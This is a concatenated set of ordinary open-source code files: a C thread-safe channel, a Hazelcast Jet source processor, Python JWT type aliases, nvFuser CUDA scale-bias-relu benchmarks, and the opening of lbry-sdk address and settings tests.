// NS_ASSUME_NONNULL_END must balance NS_ASSUME_NONNULL_BEGIN *inside* the
// include guard; it previously sat after #endif, leaving the audited region
// unbalanced when the header is included more than once.
NS_ASSUME_NONNULL_END

#endif /* StrokeManager_h */
| 900 |
118,175 | /*
* Copyright (c) Facebook, Inc. and its affiliates.
*
* This source code is licensed under the MIT license found in the
* LICENSE file in the root directory of this source tree.
*/
package com.facebook.react.uimanager.events;
/**
 * An interface that can be implemented by a {@link com.facebook.react.bridge.ReactContext} to
 * provide a first-class API for accessing the {@link EventDispatcher} from the {@link
 * com.facebook.react.bridge.UIManager}.
 */
public interface EventDispatcherProvider {

  /**
   * This method should always return an EventDispatcher, even if the instance doesn't exist; in
   * that case it should return the empty {@link BlackHoleEventDispatcher}.
   *
   * <p>Implementations must never return {@code null} — callers rely on a non-null dispatcher.
   *
   * @return An {@link EventDispatcher} to emit events to JS.
   */
  EventDispatcher getEventDispatcher();
}
| 234 |
2,098 | #define MR_CHAN_C_
#include <pthread.h>
#include <sys/time.h>
#include <stdlib.h>
#include <errno.h>
#include <stdio.h>
#include <assert.h>
// Sentinel returned by MRChannel_Pop once the channel is closed and empty.
// Callers compare by address; the string content is only a debugging aid.
void *MRCHANNEL_CLOSED = (void *)"MRCHANNEL_CLOSED";

// Singly-linked queue node. The node owns only itself; `ptr` is the caller's
// payload and is never freed by the channel.
typedef struct chanItem {
  void *ptr;
  struct chanItem *next;
} chanItem;

// FIFO channel guarded by a single mutex; bounded when maxSize > 0.
typedef struct MRChannel {
  chanItem *head;       // oldest node, popped first (NULL when empty)
  chanItem *tail;       // newest node (NULL when empty)
  size_t size;          // current number of queued items
  size_t maxSize;       // capacity limit; 0 means unbounded
  volatile int open;    // 1 while pushes are accepted; cleared by MRChannel_Close
  pthread_mutex_t lock; // protects all fields above
  pthread_cond_t cond;  // signaled on push and on close (wakes poppers)
  // condition used to wait for closing
  pthread_cond_t closeCond;
} MRChannel;
#include "chan.h"
/* Allocate and initialize a channel. `max` == 0 means unbounded; otherwise
 * MRChannel_Push fails once `max` items are queued.
 * Returns NULL on allocation failure (the malloc was previously unchecked,
 * which would have crashed on the struct-assignment below). */
MRChannel *MR_NewChannel(size_t max) {
  MRChannel *chan = malloc(sizeof(*chan));
  if (!chan) {
    return NULL;
  }
  *chan = (MRChannel){
      .head = NULL,
      .tail = NULL,
      .size = 0,
      .maxSize = max,
      .open = 1,
  };
  pthread_cond_init(&chan->cond, NULL);
  pthread_cond_init(&chan->closeCond, NULL);
  pthread_mutex_init(&chan->lock, NULL);
  return chan;
}
/* Safely wait until the channel is closed */
void MRChannel_WaitClose(MRChannel *chan) {
  pthread_mutex_lock(&chan->lock);
  // The while-loop guards against spurious wakeups; closeCond is broadcast
  // by MRChannel_Close after it clears `open` under the same lock.
  while (chan->open) {
    pthread_cond_wait(&chan->closeCond, &chan->lock);
  }
  pthread_mutex_unlock(&chan->lock);
}
/* Destroy the channel and release its resources. Queued nodes that were never
 * popped are freed here (they previously leaked); the payloads they carry are
 * NOT freed — ownership of `ptr` stays with the caller.
 * The caller must guarantee no other thread is still using the channel. */
void MRChannel_Free(MRChannel *chan) {
  if (!chan) {
    return;
  }
  // Drain any leftover queue nodes.
  chanItem *cur = chan->head;
  while (cur) {
    chanItem *next = cur->next;
    free(cur);
    cur = next;
  }
  pthread_mutex_destroy(&chan->lock);
  pthread_cond_destroy(&chan->cond);
  // closeCond is initialized in MR_NewChannel but was never destroyed.
  pthread_cond_destroy(&chan->closeCond);
  free(chan);
}
// Return the current number of queued items. The value is read under the
// lock but may be stale by the time the caller inspects it.
size_t MRChannel_Size(MRChannel *chan) {
  pthread_mutex_lock(&chan->lock);
  size_t ret = chan->size;
  pthread_mutex_unlock(&chan->lock);
  return ret;
}
// Return the channel's capacity limit (0 means unbounded). maxSize is never
// mutated after MR_NewChannel, but it is read under the lock for consistency.
size_t MRChannel_MaxSize(MRChannel *chan) {
  pthread_mutex_lock(&chan->lock);
  size_t ret = chan->maxSize;
  pthread_mutex_unlock(&chan->lock);
  return ret;
}
/* Append `ptr` to the queue. Returns 1 on success; 0 when the channel is
 * closed, at capacity, or allocation fails. Blocked poppers are woken only
 * when an item was actually queued — the previous version broadcast the
 * condition (spuriously waking waiters) even on failed pushes. */
int MRChannel_Push(MRChannel *chan, void *ptr) {
  pthread_mutex_lock(&chan->lock);
  if (!chan->open || (chan->maxSize > 0 && chan->size == chan->maxSize)) {
    pthread_mutex_unlock(&chan->lock);
    return 0;
  }
  chanItem *item = malloc(sizeof(*item));
  if (!item) {  // previously unchecked malloc
    pthread_mutex_unlock(&chan->lock);
    return 0;
  }
  item->next = NULL;
  item->ptr = ptr;
  if (chan->tail) {
    // make it the next of the current tail
    chan->tail->next = item;
    // set a new tail
    chan->tail = item;
  } else { // no tail means no head - empty queue
    chan->head = chan->tail = item;
  }
  chan->size++;
  // Wake all waiting poppers; report failure if the broadcast itself fails.
  int rc = pthread_cond_broadcast(&chan->cond) == 0 ? 1 : 0;
  pthread_mutex_unlock(&chan->lock);
  return rc;
}
/* Non-blocking pop: detach and return the oldest payload, or NULL when the
 * queue is empty. Never waits and does not consult the open/closed state. */
void *MRChannel_ForcePop(MRChannel *chan) {
  pthread_mutex_lock(&chan->lock);
  chanItem *node = chan->head;
  if (node != NULL) {
    chan->head = node->next;
    if (chan->head == NULL) {
      // removed the last element
      chan->tail = NULL;
    }
    chan->size--;
  }
  pthread_mutex_unlock(&chan->lock);
  if (node == NULL) {
    return NULL;
  }
  // Hand back the payload and recycle the node (TODO: recycle items).
  void *payload = node->ptr;
  free(node);
  return payload;
}
// todo wait is not actually used anywhere...
// Blocking pop: waits until an item is available. Returns the MRCHANNEL_CLOSED
// sentinel (compare by address) once the channel is closed AND drained; items
// queued before close are still delivered.
void *MRChannel_Pop(MRChannel *chan) {
  void *ret = NULL;
  pthread_mutex_lock(&chan->lock);
  while (!chan->size) {
    if (!chan->open) {
      pthread_mutex_unlock(&chan->lock);
      return MRCHANNEL_CLOSED;
    }
    // Woken by MRChannel_Push and MRChannel_Close broadcasts.
    int rc = pthread_cond_wait(&chan->cond, &chan->lock);
    assert(rc == 0 && "cond_wait failed");
    if (!chan->size) {
      // otherwise, spurious wakeup
      printf("spurious cond_wait wakeup\n");
      // continue..
    }
  }
  chanItem *item = chan->head;
  assert(item);
  chan->head = item->next;
  // empty queue...
  if (!chan->head) chan->tail = NULL;
  chan->size--;
  pthread_mutex_unlock(&chan->lock);
  // discard the item (TODO: recycle items)
  ret = item->ptr;
  free(item);
  return ret;
}
// Close the channel: no further pushes succeed. Wakes all blocked poppers
// (they drain remaining items, then observe MRCHANNEL_CLOSED) and releases
// any MRChannel_WaitClose waiters.
void MRChannel_Close(MRChannel *chan) {
  pthread_mutex_lock(&chan->lock);
  chan->open = 0;
  // notify any waiting readers
  pthread_cond_broadcast(&chan->cond);
  pthread_cond_broadcast(&chan->closeCond);
  pthread_mutex_unlock(&chan->lock);
}
| 1,488 |
4,283 | /*
* Copyright (c) 2008-2021, Hazelcast, Inc. All Rights Reserved.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package com.hazelcast.jet.impl.connector;
import com.hazelcast.core.ManagedContext;
import com.hazelcast.function.BiConsumerEx;
import com.hazelcast.function.FunctionEx;
import com.hazelcast.jet.Traverser;
import com.hazelcast.jet.core.AbstractProcessor;
import com.hazelcast.jet.core.BroadcastKey;
import com.hazelcast.jet.core.EventTimeMapper;
import com.hazelcast.jet.core.EventTimePolicy;
import com.hazelcast.jet.core.processor.SourceProcessors;
import com.hazelcast.jet.impl.JetEvent;
import com.hazelcast.security.PermissionsUtil;
import javax.annotation.Nonnull;
import javax.annotation.Nullable;
import java.util.ArrayList;
import java.util.List;
import java.util.function.BiConsumer;
import java.util.function.Consumer;
import java.util.function.Function;
import static com.hazelcast.jet.core.BroadcastKey.broadcastKey;
/**
 * Implements a data source the user created using the Source Builder API.
 *
 * <p>The user-supplied callbacks are held as fields: {@code createFn} builds
 * the source context, {@code fillBufferFn} is polled to add items to
 * {@code buffer}, the snapshot functions save/restore user state, and
 * {@code destroyFn} tears the context down on {@link #close()}.
 *
 * @see SourceProcessors#convenientSourceP
 * @see SourceProcessors#convenientTimestampedSourceP
 */
public class ConvenientSourceP<C, T, S> extends AbstractProcessor {

    /**
     * This processor's view of the buffer accessible to the user. Abstracts
     * away the difference between the plain and the timestamped buffer.
     */
    public interface SourceBufferConsumerSide<T> {
        /**
         * Returns a traverser over the contents of the buffer. Traversing the
         * items automatically removes them from the buffer.
         */
        Traverser<T> traverse();

        /** Returns {@code true} when the buffer currently holds no items. */
        boolean isEmpty();

        /** Returns {@code true} once the user closed the buffer (source exhausted). */
        boolean isClosed();
    }

    // User-supplied callbacks (see class javadoc).
    private final Function<? super Context, ? extends C> createFn;
    private final BiConsumer<? super C, ? super SourceBufferConsumerSide<?>> fillBufferFn;
    private final FunctionEx<? super C, ? extends S> createSnapshotFn;
    private final BiConsumerEx<? super C, ? super List<S>> restoreSnapshotFn;
    private final Consumer<? super C> destroyFn;
    private final SourceBufferConsumerSide<?> buffer;
    // Null for a non-timestamped source.
    private final EventTimeMapper<T> eventTimeMapper;

    // Key under which this processor's state is saved (per global processor index).
    private BroadcastKey<Integer> snapshotKey;
    // Set once init() ran; guards destroyFn in close().
    private boolean initialized;
    // User context from createFn; may legitimately be null (see init()).
    private C ctx;
    // In-progress output traverser; null means the buffer must be refilled.
    private Traverser<?> traverser;
    // Snapshot object created but not yet emitted to the snapshot queue.
    private S pendingState;
    // State objects accumulated while restoring from a snapshot.
    private List<S> restoredStates;

    public ConvenientSourceP(
            @Nonnull Function<? super Context, ? extends C> createFn,
            @Nonnull BiConsumer<? super C, ? super SourceBufferConsumerSide<?>> fillBufferFn,
            @Nonnull FunctionEx<? super C, ? extends S> createSnapshotFn,
            @Nonnull BiConsumerEx<? super C, ? super List<S>> restoreSnapshotFn,
            @Nonnull Consumer<? super C> destroyFn,
            @Nonnull SourceBufferConsumerSide<?> buffer,
            @Nullable EventTimePolicy<? super T> eventTimePolicy
    ) {
        this.createFn = createFn;
        this.fillBufferFn = fillBufferFn;
        this.createSnapshotFn = createSnapshotFn;
        this.restoreSnapshotFn = restoreSnapshotFn;
        this.destroyFn = destroyFn;
        this.buffer = buffer;
        if (eventTimePolicy != null) {
            eventTimeMapper = new EventTimeMapper<>(eventTimePolicy);
            // The source is treated as a single logical partition.
            eventTimeMapper.addPartitions(1);
        } else {
            eventTimeMapper = null;
        }
    }

    @Override
    public boolean isCooperative() {
        // User callbacks are free to block, so run on a dedicated thread.
        return false;
    }

    @Override
    protected void init(@Nonnull Context context) {
        PermissionsUtil.checkPermission(createSnapshotFn, context);
        // createFn is allowed to return null, we'll call `destroyFn` even for null `ctx`
        ManagedContext managedContext = context.managedContext();
        // NOTE(review): unchecked cast — initialize() returns Object; assumed
        // to hand back the same (or a compatible) instance.
        ctx = (C) managedContext.initialize(createFn.apply(context));
        snapshotKey = broadcastKey(context.globalProcessorIndex());
        initialized = true;
    }

    @Override
    public boolean complete() {
        if (traverser == null) {
            // Ask the user code to top up the buffer, then traverse it.
            fillBufferFn.accept(ctx, buffer);
            traverser =
                    eventTimeMapper == null ? buffer.traverse()
                            : buffer.isEmpty() ? eventTimeMapper.flatMapIdle()
                            : buffer.traverse().flatMap(t -> {
                                // if eventTimeMapper is not null, we know that T is JetEvent<T>
                                @SuppressWarnings("unchecked")
                                JetEvent<T> je = (JetEvent<T>) t;
                                return eventTimeMapper.flatMapEvent(je.payload(), 0, je.timestamp());
                            });
        }
        boolean bufferEmitted = emitFromTraverser(traverser);
        if (bufferEmitted) {
            // Fully drained; force a refill on the next call.
            traverser = null;
        }
        // Done only when the user closed the buffer and everything was emitted.
        return bufferEmitted && buffer.isClosed();
    }

    @Override
    public boolean saveToSnapshot() {
        // finish current traverser
        if (traverser != null && !emitFromTraverser(traverser)) {
            return false;
        }
        if (buffer.isClosed()) {
            // don't call createSnapshotFn after the buffer is closed
            return true;
        }
        traverser = null;
        // pendingState survives across calls if the snapshot queue was full.
        if (pendingState == null) {
            pendingState = createSnapshotFn.apply(ctx);
        }
        if (pendingState == null || tryEmitToSnapshot(snapshotKey, pendingState)) {
            pendingState = null;
            return true;
        }
        return false;
    }

    @Override
    @SuppressWarnings("unchecked")
    protected void restoreFromSnapshot(@Nonnull Object key, @Nonnull Object value) {
        // Collect every state object; they are handed to the user in one batch.
        if (restoredStates == null) {
            restoredStates = new ArrayList<>();
        }
        restoredStates.add((S) value);
    }

    @Override
    public boolean finishSnapshotRestore() {
        if (restoredStates != null) {
            restoreSnapshotFn.accept(ctx, restoredStates);
        }
        restoredStates = null;
        return true;
    }

    @Override
    public void close() {
        // Only destroy a context that init() actually created.
        if (initialized) {
            destroyFn.accept(ctx);
        }
    }
}
| 2,555 |
367 | from enum import Enum
from typing import Dict, Any
from jwt.algorithms import get_default_algorithms
from cryptography.hazmat._types import (
_PRIVATE_KEY_TYPES,
_PUBLIC_KEY_TYPES,
)
# custom types
# Aliases over cryptography's key-type unions.
# NOTE(review): _PRIVATE_KEY_TYPES / _PUBLIC_KEY_TYPES come from a private
# module (cryptography.hazmat._types) that may move or disappear between
# cryptography releases — confirm on dependency upgrades.
PrivateKey = _PRIVATE_KEY_TYPES
PublicKey = _PUBLIC_KEY_TYPES

# Decoded JWT payload: claim name -> claim value.
JWTClaims = Dict[str, Any]


class EncryptionKeyFormat(str, Enum):
    """
    represent the supported formats for storing encryption keys.
    - PEM (https://en.wikipedia.org/wiki/Privacy-Enhanced_Mail)
    - SSH (RFC4716) or short format (RFC4253, section-6.6, explained here: https://coolaj86.com/articles/the-ssh-public-key-format/)
    - DER (https://en.wikipedia.org/wiki/X.690#DER_encoding)
    """
    pem = 'pem'
    ssh = 'ssh'
    der = 'der'


# dynamic enum because pyjwt does not define one
# see: https://pyjwt.readthedocs.io/en/stable/algorithms.html for possible values
JWTAlgorithm = Enum('JWTAlgorithm', [(k,k) for k in get_default_algorithms().keys()])
60,067 | #include <torch/csrc/jit/codegen/cuda/arith.h>
#include <torch/csrc/jit/codegen/cuda/executor.h>
#include <torch/csrc/jit/codegen/cuda/fusion.h>
#include <torch/csrc/jit/codegen/cuda/lower2device.h>
#include <torch/csrc/jit/codegen/cuda/scheduler/all_schedulers.h>
#include <benchmark/benchmark.h>
#include <cuda_runtime.h>
#include "utils.h"
using namespace torch::jit::fuser::cuda;
// Builds a scale-bias-relu fusion: out = relu(x * scale + bias), where x is a
// 4-D contiguous tensor and scale/bias have shape [1, 1, 1, C] (broadcast
// over all but the innermost dimension). For half inputs the arithmetic runs
// in float and the result is cast back to half.
static void setupSBR(Fusion* fusion, DataType dtype) {
  TORCH_INTERNAL_ASSERT(dtype == DataType::Float || dtype == DataType::Half);
  FusionGuard fg(fusion);
  const size_t kNumberOfDims = 4;
  // Broadcast operands: extent 1 everywhere except the innermost dim,
  // whose extent is symbolic (-1); only that dim is marked contiguous.
  std::vector<int64_t> bcast_shape(kNumberOfDims, 1);
  bcast_shape[bcast_shape.size() - 1] = -1;
  std::vector<bool> bcast_contig(kNumberOfDims, false);
  bcast_contig[bcast_contig.size() - 1] = true;
  auto x = makeContigTensor(kNumberOfDims, dtype);
  auto scale = TensorViewBuilder()
                   .contiguity(bcast_contig)
                   .shape(bcast_shape)
                   .dtype(dtype)
                   .build();
  auto bias = TensorViewBuilder()
                  .contiguity(bcast_contig)
                  .shape(bcast_shape)
                  .dtype(dtype)
                  .build();
  fusion->addInput(x);
  fusion->addInput(scale);
  fusion->addInput(bias);
  if (dtype == DataType::Half) {
    // Upcast so the math runs in fp32.
    x = castOp(DataType::Float, x);
    scale = castOp(DataType::Float, scale);
    bias = castOp(DataType::Float, bias);
  }
  auto scale_bias = add(mul(x, scale), bias);
  auto scale_bias_relu = unaryOp(UnaryOpType::Relu, scale_bias);
  if (dtype == DataType::Half) {
    scale_bias_relu = castOp(DataType::Half, scale_bias_relu);
  }
  fusion->addOutput(scale_bias_relu);
}
// Builds a normalization-style scale-bias-relu fusion: per-channel weight,
// bias, mean and var (1-D tensors) are folded into a single scale/bias pair
// that is broadcast over all but the innermost dim of the 4-D input x.
// NOTE(review): the folded bias is (bias - mean) * scale, not the standard
// batch-norm form bias - mean * scale — confirm this is the intended formula.
static void setupSBRNorm(Fusion* fusion, DataType dtype) {
  TORCH_INTERNAL_ASSERT(dtype == DataType::Float || dtype == DataType::Half);
  FusionGuard fg(fusion);
  const size_t kNumberOfDims = 4;
  auto x = makeContigTensor(kNumberOfDims, dtype);
  auto weight = makeContigTensor(1, dtype);
  auto bias = makeContigTensor(1, dtype);
  auto mean = makeContigTensor(1, dtype);
  auto var = makeContigTensor(1, dtype);
  fusion->addInput(x);
  fusion->addInput(weight);
  fusion->addInput(bias);
  fusion->addInput(mean);
  fusion->addInput(var);
  // Broadcast over every dim except the innermost (channel) one.
  std::vector<bool> broadcast_mask(kNumberOfDims, true);
  broadcast_mask[broadcast_mask.size() - 1] = false;
  if (dtype == DataType::Half) {
    // Upcast so the math runs in fp32.
    x = castOp(DataType::Float, x);
    weight = castOp(DataType::Float, weight);
    bias = castOp(DataType::Float, bias);
    mean = castOp(DataType::Float, mean);
    var = castOp(DataType::Float, var);
  }
  auto rsqrt = unaryOp(UnaryOpType::Rsqrt, var);
  auto this_scale = mul(weight, rsqrt);
  auto this_bias = mul(sub(bias, mean), this_scale);
  auto bcast_scale = broadcast(this_scale, broadcast_mask);
  auto bcast_bias = broadcast(this_bias, broadcast_mask);
  auto scale_bias = add(mul(x, bcast_scale), bcast_bias);
  auto scale_bias_relu = unaryOp(UnaryOpType::Relu, scale_bias);
  if (dtype == DataType::Half) {
    scale_bias_relu = castOp(DataType::Half, scale_bias_relu);
  }
  fusion->addOutput(scale_bias_relu);
}
//------------------------------------------------------------------------------
// Benchmarks the nvFuser-compiled scale-bias-relu fusion. The benchmark
// ranges supply N, H (= W) and C of an NHWC input; kernel time is measured
// on-device and reported via manual timing.
static void NvFuserScheduler_SBR(
    benchmark::State& benchmark_state,
    FusionExecutorCache* fusion_executor_cache,
    DataType dtype) {
  // N, H, W, C format
  std::vector<int64_t> input_shape{
      benchmark_state.range(0),
      benchmark_state.range(1),
      benchmark_state.range(1),
      benchmark_state.range(2)};
  std::vector<int64_t> bcast_shape{1, 1, 1, -1};
  // inputs
  at::manual_seed(0);
  std::vector<int64_t> static_bcast_shape{1, 1, 1, benchmark_state.range(2)};
  auto options =
      at::TensorOptions().dtype(data_type_to_aten(dtype)).device(at::kCUDA, 0);
  at::Tensor at_x = at::randn(input_shape, options);
  at::Tensor at_scale = at::ones(static_bcast_shape, options);
  at::Tensor at_bias = at::zeros(static_bcast_shape, options);
  // inputs
  std::vector<c10::IValue> aten_inputs = {at_x, at_scale, at_bias};
  // Warm-up run with profiling on, to capture scheduler/launch parameters.
  fusion_executor_cache->profile(true);
  fusion_executor_cache->runFusionWithInputs(aten_inputs);
  auto compile_log = fusion_executor_cache->getMostRecentExecutorInfo();
  auto executor_instance = compile_log.fusion_executor;
  TORCH_INTERNAL_ASSERT(compile_log.pointwise_params.has_value());
  TORCH_INTERNAL_ASSERT(compile_log.launch_constraints.has_value());
  auto params = toString(compile_log.pointwise_params.value());
  auto lparams = toString(compile_log.launch_constraints.value());
  // Label with scheduler params + launch constraints, matching the SBR_Norm
  // variant. A second SetLabel(lparams) call here used to overwrite this
  // label with only the launch params.
  benchmark_state.SetLabel(params + lparams);
  fusion_executor_cache->profile(false);
  executor_instance->setMeasureKernelTimeFlag(true);
  // Sync everything up before we start
  cudaDeviceSynchronize();
  for (auto _ : benchmark_state) {
    auto cg_outputs = fusion_executor_cache->runFusionWithInputs(aten_inputs);
    benchmark_state.SetIterationTime(
        executor_instance->kernelTimeMs() / 1000.0);
    clearL2Cache();
  }
  // Sync everything up before we're finished, don't want to run ahead on the
  // cpu while benchmarking.
  cudaDeviceSynchronize();
  const size_t size =
      input_shape[0] * input_shape[1] * input_shape[2] * input_shape[3];
  const size_t channels = input_shape[3];
  // Bytes moved: read + write of the full tensor, read of scale and bias.
  benchmark_state.SetBytesProcessed(
      int64_t(benchmark_state.iterations()) * (channels * 2 + size * 2) *
      int64_t(dataTypeSize(dtype)));
}
// Eager-mode (unfused ATen ops) baseline for the scale-bias-relu benchmark.
static void Baseline_SBR(benchmark::State& benchmark_state, DataType dtype) {
  // N, H, W, C format
  std::vector<int64_t> input_shape{
      benchmark_state.range(0),
      benchmark_state.range(1),
      benchmark_state.range(1),
      benchmark_state.range(2)};
  std::vector<int64_t> bcast_shape{benchmark_state.range(2)};
  // inputs
  at::manual_seed(0);
  auto options =
      at::TensorOptions().dtype(data_type_to_aten(dtype)).device(at::kCUDA, 0);
  at::Tensor at_x = at::randn(input_shape, options);
  // (removed an unused `at_y` randn allocation that was never read)
  at::Tensor at_scale = at::ones(bcast_shape, options);
  at::Tensor at_bias = at::zeros(bcast_shape, options);
  cudaDeviceSynchronize();
  for (auto _ : benchmark_state) {
    CudaKernelTimer timer;
    auto scale = at::mul(at_x, at_scale);
    auto bias = at::add(scale, at_bias);
    auto output = at::relu(bias);
    benchmark_state.SetIterationTime(timer.elapsed() / 1000.0);
    cudaDeviceSynchronize();
    clearL2Cache();
    cudaDeviceSynchronize();
  }
  const size_t size =
      input_shape[0] * input_shape[1] * input_shape[2] * input_shape[3];
  const size_t channels = input_shape[3];
  benchmark_state.SetBytesProcessed(
      int64_t(benchmark_state.iterations()) * (channels * 2 + size * 2) *
      int64_t(dataTypeSize(dtype)));
}
//------------------------------------------------------------------------------
// Benchmarks the nvFuser-compiled normalization-style scale-bias-relu fusion
// (see setupSBRNorm). Per-channel weight/bias/mean/var are 1-D tensors.
static void NvFuserScheduler_SBR_Norm(
    benchmark::State& benchmark_state,
    FusionExecutorCache* fusion_executor_cache,
    DataType dtype) {
  // N, H, W, C format
  std::vector<int64_t> input_shape{
      benchmark_state.range(0),
      benchmark_state.range(1),
      benchmark_state.range(1),
      benchmark_state.range(2)};
  std::vector<int64_t> bcast_shape{benchmark_state.range(2)};
  // inputs
  at::manual_seed(0);
  auto options =
      at::TensorOptions().dtype(data_type_to_aten(dtype)).device(at::kCUDA, 0);
  at::Tensor at_x = at::randn(input_shape, options);
  at::Tensor at_weight = at::ones(bcast_shape, options);
  at::Tensor at_bias = at::zeros(bcast_shape, options);
  at::Tensor at_mean = at::zeros(bcast_shape, options);
  at::Tensor at_var = at::ones(bcast_shape, options);
  // inputs
  std::vector<c10::IValue> aten_inputs = {
      at_x, at_weight, at_bias, at_mean, at_var};
  // Warm-up run with profiling on, to capture scheduler/launch parameters.
  fusion_executor_cache->profile(true);
  fusion_executor_cache->runFusionWithInputs(aten_inputs);
  auto compile_log = fusion_executor_cache->getMostRecentExecutorInfo();
  auto executor_instance = compile_log.fusion_executor;
  TORCH_INTERNAL_ASSERT(compile_log.pointwise_params.has_value());
  TORCH_INTERNAL_ASSERT(compile_log.launch_constraints.has_value());
  auto params = toString(compile_log.pointwise_params.value());
  auto lparams = toString(compile_log.launch_constraints.value());
  benchmark_state.SetLabel(params + lparams);
  fusion_executor_cache->profile(false);
  executor_instance->setMeasureKernelTimeFlag(true);
  // Sync everything up before we start
  cudaDeviceSynchronize();
  for (auto _ : benchmark_state) {
    auto cg_outputs = fusion_executor_cache->runFusionWithInputs(aten_inputs);
    benchmark_state.SetIterationTime(
        executor_instance->kernelTimeMs() / 1000.0);
    clearL2Cache();
  }
  // Sync everything up before we're finished, don't want to run ahead on the
  // cpu while benchmarking.
  cudaDeviceSynchronize();
  const size_t size =
      input_shape[0] * input_shape[1] * input_shape[2] * input_shape[3];
  const size_t channels = input_shape[3];
  // Bytes moved: read + write of the full tensor, read of the four 1-D stats.
  benchmark_state.SetBytesProcessed(
      int64_t(benchmark_state.iterations()) * (channels * 4 + size * 2) *
      int64_t(dataTypeSize(dtype)));
}
// Eager-mode (unfused ATen ops) baseline matching setupSBRNorm's math.
static void Baseline_SBR_Norm(
    benchmark::State& benchmark_state,
    DataType dtype) {
  // N, H, W, C format
  std::vector<int64_t> input_shape{
      benchmark_state.range(0),
      benchmark_state.range(1),
      benchmark_state.range(1),
      benchmark_state.range(2)};
  std::vector<int64_t> bcast_shape{1, 1, 1, benchmark_state.range(2)};
  // inputs
  at::manual_seed(0);
  auto options =
      at::TensorOptions().dtype(data_type_to_aten(dtype)).device(at::kCUDA, 0);
  at::Tensor at_x = at::randn(input_shape, options);
  at::Tensor at_weight = at::ones(bcast_shape, options);
  at::Tensor at_bias = at::zeros(bcast_shape, options);
  at::Tensor at_mean = at::zeros(bcast_shape, options);
  at::Tensor at_var = at::ones(bcast_shape, options);
  cudaDeviceSynchronize();
  for (auto _ : benchmark_state) {
    CudaKernelTimer timer;
    // Same folding as the fusion: scale = weight * rsqrt(var),
    // bias' = (bias - mean) * scale.
    auto this_scale = at::mul(at_weight, at::rsqrt(at_var));
    auto this_bias = at::mul(at::sub(at_bias, at_mean), this_scale);
    auto scale = at::mul(at_x, this_scale);
    auto bias = at::add(scale, this_bias);
    auto output = at::relu(bias);
    benchmark_state.SetIterationTime(timer.elapsed() / 1000.0);
    cudaDeviceSynchronize();
  }
  const size_t size =
      input_shape[0] * input_shape[1] * input_shape[2] * input_shape[3];
  const size_t channels = input_shape[3];
  benchmark_state.SetBytesProcessed(
      int64_t(benchmark_state.iterations()) * (channels * 4 + size * 2) *
      int64_t(dataTypeSize(dtype)));
}
//------------------------------------------------------------------------------
// ---- nvFuser-scheduled benchmark registrations (fp32 / fp16) ----
// Ranges: {N} x {H = W} x {C}, all timed manually from device kernel time.
NVFUSER_BENCHMARK_DEFINE(
    NvFuserScheduler_SBR_fp32,
    setupSBR,
    NvFuserScheduler_SBR,
    DataType::Float);

NVFUSER_BENCHMARK_RUN(NvFuserScheduler_SBR_fp32)
    ->RangeMultiplier(2)
    ->Ranges({{8, 8}, {640, 640}, {64, 256}})
    ->Unit(benchmark::kMicrosecond)
    ->UseManualTime();

NVFUSER_BENCHMARK_DEFINE(
    NvFuserScheduler_SBR_fp16,
    setupSBR,
    NvFuserScheduler_SBR,
    DataType::Half);

NVFUSER_BENCHMARK_RUN(NvFuserScheduler_SBR_fp16)
    ->RangeMultiplier(2)
    ->Ranges({{8, 8}, {640, 640}, {64, 256}})
    ->Unit(benchmark::kMicrosecond)
    ->UseManualTime();

//------------------------------------------------------------------------------

NVFUSER_BENCHMARK_DEFINE(
    NvFuserScheduler_SBR_Norm_fp32,
    setupSBRNorm,
    NvFuserScheduler_SBR_Norm,
    DataType::Float);

NVFUSER_BENCHMARK_RUN(NvFuserScheduler_SBR_Norm_fp32)
    ->RangeMultiplier(2)
    ->Ranges({{8, 8}, {640, 640}, {64, 256}})
    ->Unit(benchmark::kMicrosecond)
    ->UseManualTime();

NVFUSER_BENCHMARK_DEFINE(
    NvFuserScheduler_SBR_Norm_fp16,
    setupSBRNorm,
    NvFuserScheduler_SBR_Norm,
    DataType::Half);

NVFUSER_BENCHMARK_RUN(NvFuserScheduler_SBR_Norm_fp16)
    ->RangeMultiplier(2)
    ->Ranges({{8, 8}, {640, 640}, {64, 256}})
    ->Unit(benchmark::kMicrosecond)
    ->UseManualTime();

// ---- Eager-mode baselines, registered with plain Google Benchmark ----
static void Baseline_SBR_fp32(benchmark::State& benchmark_state) {
  Baseline_SBR(benchmark_state, DataType::Float);
}

BENCHMARK(Baseline_SBR_fp32)
    ->RangeMultiplier(2)
    ->Ranges({{8, 8}, {640, 640}, {64, 256}})
    ->Unit(benchmark::kMicrosecond)
    ->UseManualTime();

static void Baseline_SBR_fp16(benchmark::State& benchmark_state) {
  Baseline_SBR(benchmark_state, DataType::Half);
}

BENCHMARK(Baseline_SBR_fp16)
    ->RangeMultiplier(2)
    ->Ranges({{8, 8}, {640, 640}, {64, 256}})
    ->Unit(benchmark::kMicrosecond)
    ->UseManualTime();

//------------------------------------------------------------------------------

static void Baseline_SBR_Norm_fp32(benchmark::State& benchmark_state) {
  Baseline_SBR_Norm(benchmark_state, DataType::Float);
}

BENCHMARK(Baseline_SBR_Norm_fp32)
    ->RangeMultiplier(2)
    ->Ranges({{8, 8}, {640, 640}, {64, 256}})
    ->Unit(benchmark::kMicrosecond)
    ->UseManualTime();

static void Baseline_SBR_Norm_fp16(benchmark::State& benchmark_state) {
  Baseline_SBR_Norm(benchmark_state, DataType::Half);
}

BENCHMARK(Baseline_SBR_Norm_fp16)
    ->RangeMultiplier(2)
    ->Ranges({{8, 8}, {640, 640}, {64, 256}})
    ->Unit(benchmark::kMicrosecond)
    ->UseManualTime();
| 5,317 |
4,996 | <reponame>nishp77/lbry-sdk
from lbry.testcase import CommandTestCase
class AddressManagement(CommandTestCase):
    """Coverage for the `address_list` RPC."""

    async def test_address_list(self):
        # With no argument, every wallet address is listed.
        full_listing = await self.out(self.daemon.jsonrpc_address_list())
        self.assertItemCount(full_listing, 27)
        # Filtering by one concrete address narrows the result to that entry.
        target = full_listing['items'][11]
        filtered = await self.out(self.daemon.jsonrpc_address_list(target['address']))
        self.assertItemCount(filtered, 1)
        self.assertEqual(filtered['items'][0], target)
class SettingsManagement(CommandTestCase):
    """Coverage for the settings_get / settings_set / settings_clear RPCs."""

    async def test_settings(self):
        # The harness configures 'localhost:50002' as the default server.
